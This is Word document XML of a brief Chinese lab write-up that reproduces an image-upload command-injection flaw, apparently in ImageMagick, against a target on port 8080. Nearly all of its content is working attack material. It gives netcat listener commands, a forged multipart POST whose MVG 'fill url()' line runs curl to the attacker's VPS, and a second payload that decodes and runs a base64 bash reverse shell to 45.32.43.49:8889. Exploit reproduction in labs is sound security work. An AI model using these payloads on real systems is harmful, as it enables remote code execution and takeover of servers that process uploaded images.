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2C" w:rsidRPr="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C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ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392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68686" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="27305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86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92C" w:rsidRDefault="00ED392C">
                            <w:r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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C">
                      <w:r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D392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问靶机8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRPr="00ED392C" w:rsidRDefault="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启端口监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392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74129" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="22225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1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92C" w:rsidRDefault="00ED392C">
                            <w:r>
                              <w:t>nc –lvnp 8889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5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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C">
                      <w:r>
                        <w:t>nc –lvnp 8889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D392C" w:rsidRDefault="00ED392C">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、发送如下数据包（命令执行），中间的url改成自己的</w:t>
      </w:r>
      <w:r>
        <w:t>vps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392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85014" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1143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50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92C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>POST / HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Host: localhost:8080</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Accept-Encoding: gzip, deflate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Content-Length: 328</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C"/>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Content-Disposition: form-data; name="file_upload"; filename="1.gif"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>Content-Type: image/png</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C"/>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>push graphic-context</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>viewbox 0 0 640 480</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>fill 'url(https://127.0.0.0/oops.jpg"|curl "</w:t>
                            </w:r>
                            <w:r>
                              <w:t>VPS</w:t>
                            </w:r>
                            <w:r>
                              <w:t>:8889)'</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>pop graphic-context</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                            <w:r>
                              <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et--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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>POST / HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Host: localhost:8080</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Content-Length: 328</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C"/>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Content-Disposition: form-data; name="file_upload"; filename="1.gif"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>Content-Type: image/png</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C"/>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>push graphic-context</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>viewbox 0 0 640 480</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>fill 'url(https://127.0.0.0/oops.jpg"|curl "</w:t>
                      </w:r>
                      <w:r>
                        <w:t>VPS</w:t>
                      </w:r>
                      <w:r>
                        <w:t>:8889)'</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>pop graphic-context</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C" w:rsidP="00ED392C">
                      <w:r>
                        <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et--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D392C" w:rsidRDefault="00ED392C">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功收到请求数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41141A3E" wp14:editId="51CE61F1">
            <wp:extent cx="5274310" cy="977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2C" w:rsidRDefault="00ED392C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新开启端口监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="003D274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57800" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="19050" b="1778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74A" w:rsidRDefault="003D274A">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003D274A">
                              <w:t>nc -lvnp 8889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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003D274A">
                        <w:t>nc -lvnp 8889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D392C" w:rsidRDefault="00ED392C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5、发送如下数据包（反弹She</w:t>
      </w:r>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="003D274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68686" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="27305" b="1778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86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74A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>POST / HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Host: localhost:8080</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Accept-Encoding: gzip, deflate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Content-Length: 328</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A"/>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Content-Disposition: form-data; name="file_upload"; filename="1.gif"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r w:rsidRPr="003D274A">
                              <w:t>Content-Type: image/png</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A"/>
                          <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r>
                              <w:t>push graphic-context</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r>
                              <w:t>viewbox 0 0 640 480</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r>
                              <w:t>fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzQ1LjMyLjQzLjQ5Lzg4ODkgMD4mMQ== | base64 -d | bash`"||id " )'</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                            <w:r>
                              <w:t>pop graphic-context</w:t>
                            </w:r>
                            <w:r w:rsidRPr="003D274A">
                              <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et--</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003D274A" w:rsidRDefault="003D274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1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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>POST / HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Host: localhost:8080</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Content-Length: 328</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A"/>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Content-Disposition: form-data; name="file_upload"; filename="1.gif"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r w:rsidRPr="003D274A">
                        <w:t>Content-Type: image/png</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A"/>
                    <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r>
                        <w:t>push graphic-context</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r>
                        <w:t>viewbox 0 0 640 480</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r>
                        <w:t>fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzQ1LjMyLjQzLjQ5Lzg4ODkgMD4mMQ== | base64 -d | bash`"||id " )'</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRPr="003D274A" w:rsidRDefault="003D274A" w:rsidP="003D274A">
                      <w:r>
                        <w:t>pop graphic-context</w:t>
                      </w:r>
                      <w:r w:rsidRPr="003D274A">
                        <w:t>------WebKitFormBoundarymdcbmdQR1sDse9Et--</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003D274A" w:rsidRDefault="003D274A"/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ED392C" w:rsidRPr="00ED392C" w:rsidRDefault="00ED392C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功收到S</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392C" w:rsidRDefault="003D274A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61034C08" wp14:editId="24577B5A">
            <wp:extent cx="5274310" cy="1047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CDB" w:rsidRDefault="00233CDB" w:rsidP="00ED392C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00233CDB" w:rsidRDefault="00233CDB" w:rsidP="00ED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CDB" w:rsidRDefault="00233CDB" w:rsidP="00ED392C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00233CDB" w:rsidRDefault="00233CDB" w:rsidP="00ED3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13"/>
    <w:rsid w:val="00233CDB"/>
    <w:rsid w:val="003D274A"/>
    <w:rsid w:val="00E50F13"/>
    <w:rsid w:val="00ED392C"/>
    <w:rsid w:val="00F4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74682"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55234A32-41BE-4984-B213-1642CC31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9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0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2022-05-26T10:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T11:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>